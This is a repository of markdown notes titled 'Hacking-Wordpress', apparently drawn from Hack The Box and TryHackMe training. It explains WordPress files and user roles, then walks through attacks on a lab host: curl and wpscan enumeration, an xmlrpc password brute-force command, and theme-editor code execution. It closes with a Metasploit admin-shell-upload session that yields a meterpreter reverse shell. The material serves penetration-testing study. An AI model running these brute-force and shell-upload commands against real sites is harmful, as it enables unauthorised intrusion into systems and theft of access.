├── README.md
└── wordpress_basic
    └── Wordpress Structure.md


/README.md:
--------------------------------------------------------------------------------
  1 | #          🔥Hacking-Wordpress 🔥
  2 | ![wordpress-hacking](https://user-images.githubusercontent.com/79256105/165776319-f7d73fb8-6bd9-4847-97da-461b641fbfe0.png)
  3 | 
  4 | # Basic Wordpress and Wordpress Structure
  5 | ### 🔥Wordpress Structure 🔥
  6 | 
  7 | WordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will focus on a default WordPress installation on an Ubuntu Linux web server. WordPress requires a fully installed and configured LAMP stack (Linux operating system, Apache HTTP Server, MySQL database, and the PHP programming language) before installation on a Linux host. After installation, all WordPress supporting files and directories will be accessible in the webroot located at /var/www/html.
  8 | 
  9 | Below is the directory structure of a default WordPress install, showing the key files and subdirectories necessary for the website to function properly.
 10 | 
 11 | 
 12 |      tree -L 1 /var/www/html
 13 | 
 14 |      ├── index.php
 15 |      ├── license.txt
 16 |      ├── readme.html
 17 |      ├── wp-activate.php
 18 |      ├── wp-admin
 19 |      ├── wp-blog-header.php
 20 |      ├── wp-comments-post.php
 21 |      ├── wp-config.php
 22 |      ├── wp-config-sample.php
 23 |      ├── wp-content
 24 |      ├── wp-cron.php
 25 |      ├── wp-includes
 26 |      ├── wp-links-opml.php
 27 |      ├── wp-load.php
 28 |      ├── wp-login.php
 29 |      ├── wp-mail.php
 30 |      ├── wp-settings.php
 31 |      ├── wp-signup.php
 32 |      ├── wp-trackback.php
 33 |      └── xmlrpc.php
 34 | 
 35 | ## 👽 Key WordPress Files ♀️
 36 | 
 37 | The root directory of WordPress contains files that are needed to configure WordPress to function correctly.
 38 | 
 39 |     index.php is the homepage of WordPress.
 40 | 
 41 |     license.txt contains useful information such as the version WordPress installed.
 42 | 
 43 |     wp-activate.php is used for the email activation process when setting up a new WordPress site.
 44 | 
 45 |     wp-admin folder contains the login page for administrator access and the backend dashboard. Once a user has logged in, they can make changes to the site based on their assigned permissions. The login page can be located at one of the following paths:
 46 |     /wp-admin/login.php
 47 |     /wp-admin/wp-login.php
 48 |     /login.php
 49 |     /wp-login.php
 50 | 
 51 | This file can also be renamed to make it more challenging to find the login page.
 52 | 
 53 |     xmlrpc.php is a file representing a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
 54 | WordPress Configuration File
 55 | ## WordPress Configuration File
 56 |     The wp-config.php file contains information required by WordPress to connect to the database, such as the database name, database host, username and password, authentication keys and salts, and the database table prefix. This configuration file can also be used to activate DEBUG mode, which can useful in troubleshooting.
 57 | wp-config.php
 58 | 
 59 | 
 60 |     Code: php
 61 | 
 62 |     <?php
 63 |     /** <SNIP> */
 64 |     /** The name of the database for WordPress */
 65 |     define( 'DB_NAME', 'database_name_here' );
 66 | 
 67 |     /** MySQL database username */
 68 |     define( 'DB_USER', 'username_here' );
 69 | 
 70 |     /** MySQL database password */
 71 |     define( 'DB_PASSWORD', 'password_here' );
 72 | 
 73 |     /** MySQL hostname */
 74 |      define( 'DB_HOST', 'localhost' );
 75 | 
 76 |      /** Authentication Unique Keys and Salts */
 77 |       /* <SNIP> */
 78 |      define( 'AUTH_KEY',         'put your unique phrase here' );
 79 |      define( 'SECURE_AUTH_KEY',  'put your unique phrase here' );
 80 |      define( 'LOGGED_IN_KEY',    'put your unique phrase here' );
 81 |      define( 'NONCE_KEY',        'put your unique phrase here' );
 82 |      define( 'AUTH_SALT',        'put your unique phrase here' );
 83 |      define( 'SECURE_AUTH_SALT', 'put your unique phrase here' );
 84 |      define( 'LOGGED_IN_SALT',   'put your unique phrase here' );
 85 |      define( 'NONCE_SALT',       'put your unique phrase here' );
 86 | 
 87 |      /** WordPress Database Table prefix */
 88 |      $table_prefix = 'wp_';
 89 | 
 90 |      /** For developers: WordPress debugging mode. */
 91 |     /** <SNIP> */
 92 |     define( 'WP_DEBUG', false );
 93 | 
 94 |     /** Absolute path to the WordPress directory. */
 95 |      if ( ! defined( 'ABSPATH' ) ) {
 96 |      define( 'ABSPATH', __DIR__ . '/' );
 97 |     }
 98 | 
 99 |     /** Sets up WordPress vars and included files. */
100 |     require_once ABSPATH . 'wp-settings.php';
101 | 
102 | # Key WordPress Directories
103 | The wp-content folder is the main directory where plugins and themes are stored. The subdirectory uploads/ is usually where any files uploaded to the platform are stored. These directories and files should be carefully enumerated as they may lead to contain sensitive data that could lead to remote code execution or exploitation of other vulnerabilities or misconfigurations.
104 |     
105 | #### WP-Content
106 | 
107 |     tree -L 1 /var/www/html/wp-content
108 | 
109 |     ├── index.php
110 |     ├── plugins
111 |     └── themes
112 |  
113 | #### WP-Includes
114 | 
115 | wp-includes contains everything except for the administrative components and the themes that belong to the website. This is the directory where core files are stored, such as certificates, fonts, JavaScript files, and widgets.
116 | 
117 |    
118 |      tree -L 1 /var/www/html/wp-includes
119 | 
120 |      ├── theme.php
121 |      ├── update.php
122 |      ├── user.php
123 |      ├── vars.php
124 |      ├── version.php
125 |      ├── widgets
126 |      ├── widgets.php
127 |      ├── wlwmanifest.xml
128 |      ├── wp-db.php
129 |      └── wp-diff.php
130 |      
131 |  
132 | # WordPress User Roles 
133 | 
134 | There are five types of users in a standard WordPress installation.
135 | 
136 |      Role 	          Description
137 |      Administrator 	This user has access to administrative features within the website. This includes adding and deleting users and posts, as well as                         editing source code.
138 |      Editor 	     An editor can publish and manage posts, including the posts of other users.
139 |      Author 	     Authors can publish and manage their own posts.
140 |      Contributor 	These users can write and manage their own posts but cannot publish them.
141 |      Subscriber 	These are normal users who can browse posts and edit their profiles.
142 | 
143 | 
144 | Gaining access as an administrator is usually needed to obtain code execution on the server. However, editors and authors might have access to certain vulnerable plugins that normal users do not.
145 |  
146 |  
147 | # 🥇Enumeration Procedure For Wordpress Website in Manually
148 | 
149 | ### Wordpress Version Check
150 | 
151 | Check Wordpress Version using given below curl command or seeing source code
152 | 
153 |     commnad:
154 |             curl -s -X GET http://blog.inlanefreight.com | grep '<meta name="generator"'
155 |         
156 |  Also check WP Version - CSS and WP Version - JS version from Source Code 
157 |  
158 | ### ▶️ Plugins and Themes Enumeration
159 | 
160 | Commnad For Plugins: 
161 |       
162 |       curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'wp-content/plugins/*' | cut -d"'" -f2
163 |  
164 | Command For Themmes:
165 |       
166 |       curl -s -X GET http://blog.inlanefreight.com | sed 's/href=/\n/g' | sed 's/src=/\n/g' | grep 'themes' | cut -d"'" -f2
167 |       
168 |     
169 | #### ⏩ User Enumeration
170 | Enumerating a list of valid users is a critical phase of a WordPress security assessment. Armed with this list, we may be able to guess default credentials or perform a brute force password attack. If successful, we may be able to log in to the WordPress backend as an author or even as an administrator. This access can potentially be leveraged to modify the WordPress website or even interact with the underlying web server.
171 | 
172 | Command :
173 |         
174 |         curl http://blog.inlanefreight.com/wp-json/wp/v2/users
175 |          
176 |          
177 |  
178 | # ⤵️Enumeration Procedure For Wordpress Website in Automatically Using wpscan
179 | WPScan is an automated WordPress scanner and enumeration tool. It determines if the various themes and plugins used by a WordPress site are outdated or vulnerable. It is installed by default on Parrot OS ,Kali OS but can also be installed manually with gem
180 |          gem install wpscan
181 | Once the installation completes, we can issue a command such as ***wpscan*** --hh to verify the installation. This command will show us the usage menu with all of the available command-line switches available.
182 | ### 🔥Enumerating a Website with WPScan ⚛️
183 | The --enumerate flag is used to enumerate various components of the WordPress application such as plugins, themes, and users. By default, ***WPScan enumerates vulnerable plugins, themes, users, media, and backups***. However, specific arguments can be supplied to restrict enumeration to specific components. For example, all plugins can be enumerated using the arguments --enumerate ap. Let's run a normal enumeration scan against a WordPress website.
184 | Command :
185 | 
186 |             wpscan --url http://blog.inlanefreight.com --enumerate --api-token api-token-value
187 | Example :
188 |  
189 |             wpscan --url http://10.129.2.37/ --enumerate --api-token cs0QRHwsYE6RvLd6SaHDhI1dmNX8ZVLEx0Fb7mNid9s
190 |             
191 |       
192 | ##### 👀Note: Api Token Generator Link https://wpscan.com/
193 | 
194 | 
195 | # ✔️ Exploiting a Vulnerable Plugin
196 | If we are checking and testing properly of our target wordpress website and if  target wordpress website is vulneable we will see some CVE or Exploite information after using above wpscan command
197 | ### ☑️WordPress User Bruteforce
198 | WPScan can be used to brute force usernames and passwords. The tool uses two kinds of login brute force attacks, xmlrpc and wp-login. The wp-login method will attempt to brute force the normal WordPress login page, while the xmlrpc method uses the WordPress API to make login attempts through /xmlrpc.php. The xmlrpc method is preferred as it is faster.
199 | 
200 | Command :
201 |           
202 |           wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com
203 |           
204 | #### 👁️Note: use username and password in http://sitename/login path
205 |           
206 | # 🔥Remote Code Execution (RCE) via the Theme Editor 🔥
207 | 
208 | With administrative access to WordPress, we can modify the PHP source code to execute system commands. To perform this attack, log in to WordPress with the administrator credentials, which should redirect us to the admin panel. Click on Appearance on the side panel and select Theme Editor. This page will allow us to edit the PHP source code directly. We should select an inactive theme in order to avoid corrupting the main theme.
209 | 
210 | # 🔥Attacking WordPress with Metasploit 🔥
211 | We can use the Metasploit Framework (MSF) to obtain a reverse shell on the target automatically. This requires valid credentials for an account that has sufficient rights to create files on the webserver.
212 | ###### To obtain the reverse shell, we can use the wp_admin_shell_upload module. We can easily search for it inside MSF:
213 | 
214 |         msf5 > search wp_admin
215 | 
216 | ###### Matching Modules
217 | 
218 | 0  exploit/unix/webapp/wp_admin_shell_upload  2015-02-21       excellent  Yes    WordPress Admin Shell Upload
219 | ###### Module Selection:
220 | msf5 > use 0
221 | 
222 | msf5 exploit(unix/webapp/wp_admin_shell_upload) >
223 | 
224 | ###### Module Options
225 |                   
226 |         msf5 exploit(unix/webapp/wp_admin_shell_upload) > options
227 | 
228 | ##### Module options (exploit/unix/webapp/wp_admin_shell_upload):
229 | 
230 | 
231 |        PASSWORD                    yes       The WordPress password to authenticate with
232 |        Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
233 |        RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
234 |        RPORT      80               yes       The target port (TCP)
235 |        SSL        false            no        Negotiate SSL/TLS for outgoing connections
236 |        TARGETURI  /                yes       The base path to the wordpress application
237 |        USERNAME                    yes       The WordPress username to authenticate with
238 |        VHOST                       no        HTTP server virtual host
239 | 
240 | 
241 | Exploit target:
242 | 
243 |        Id  Name
244 |        --  ----
245 |        0   WordPress
246 |     
247 | #### set and Exploitation
248 |    
249 |     msf5 exploit(unix/webapp/wp_admin_shell_upload) > set rhosts blog.inlanefreight.com
250 |     msf5 exploit(unix/webapp/wp_admin_shell_upload) > set username admin
251 |     msf5 exploit(unix/webapp/wp_admin_shell_upload) > set password Winter2020
252 |     msf5 exploit(unix/webapp/wp_admin_shell_upload) > set lhost 10.10.16.8
253 |     msf5 exploit(unix/webapp/wp_admin_shell_upload) > run
254 | 
255 | meterpreter > getuid
256 | Server username: www—data (33)
257 | ## 🙏Practicing Sites:
258 |                   https://tryhackme.com/room/allinonemj
259 |                   https://tryhackme.com/room/wordpresscve202129447
260 |                   https://tryhackme.com/room/blog
261 |                   
262 | ## 🎆 Website Security Testing Site:
263 |                                    https://sitecheck.sucuri.net/
264 |                                     
265 | ## 💠 Happy Hackings 🔡
266 | 
267 | ## ℹ️  Source: Hack The Box Accademy and Try Hack Me 🔽
268 | 


--------------------------------------------------------------------------------
/wordpress_basic/Wordpress Structure.md:
--------------------------------------------------------------------------------
 1 | # 🔥Wordpress Structure 🔥
 2 | 
 3 | WordPress can be installed on a Windows, Linux, or Mac OSX host. For this module, we will focus on a default WordPress installation on an Ubuntu Linux web server. WordPress requires a fully installed and configured LAMP stack (Linux operating system, Apache HTTP Server, MySQL database, and the PHP programming language) before installation on a Linux host. After installation, all WordPress supporting files and directories will be accessible in the webroot located at /var/www/html.
 4 | 
 5 | Below is the directory structure of a default WordPress install, showing the key files and subdirectories necessary for the website to function properly.
 6 | 
 7 | 
 8 |      tree -L 1 /var/www/html
 9 | 
10 |      ├── index.php
11 |      ├── license.txt
12 |      ├── readme.html
13 |      ├── wp-activate.php
14 |      ├── wp-admin
15 |      ├── wp-blog-header.php
16 |      ├── wp-comments-post.php
17 |      ├── wp-config.php
18 |      ├── wp-config-sample.php
19 |      ├── wp-content
20 |      ├── wp-cron.php
21 |      ├── wp-includes
22 |      ├── wp-links-opml.php
23 |      ├── wp-load.php
24 |      ├── wp-login.php
25 |      ├── wp-mail.php
26 |      ├── wp-settings.php
27 |      ├── wp-signup.php
28 |      ├── wp-trackback.php
29 |      └── xmlrpc.php
30 | ## Key WordPress Files
31 | 
32 | The root directory of WordPress contains files that are needed to configure WordPress to function correctly.
33 | 
34 |     index.php is the homepage of WordPress.
35 | 
36 |     license.txt contains useful information such as the version WordPress installed.
37 | 
38 |     wp-activate.php is used for the email activation process when setting up a new WordPress site.
39 | 
40 |     wp-admin folder contains the login page for administrator access and the backend dashboard. Once a user has logged in, they can make changes to the site based on their assigned permissions. The login page can be located at one of the following paths:
41 |     /wp-admin/login.php
42 |     /wp-admin/wp-login.php
43 |     /login.php
44 |     /wp-login.php
45 | 
46 | This file can also be renamed to make it more challenging to find the login page.
47 | 
48 |     xmlrpc.php is a file representing a feature of WordPress that enables data to be transmitted with HTTP acting as the transport mechanism and XML as the encoding mechanism. This type of communication has been replaced by the WordPress REST API.
49 | 


--------------------------------------------------------------------------------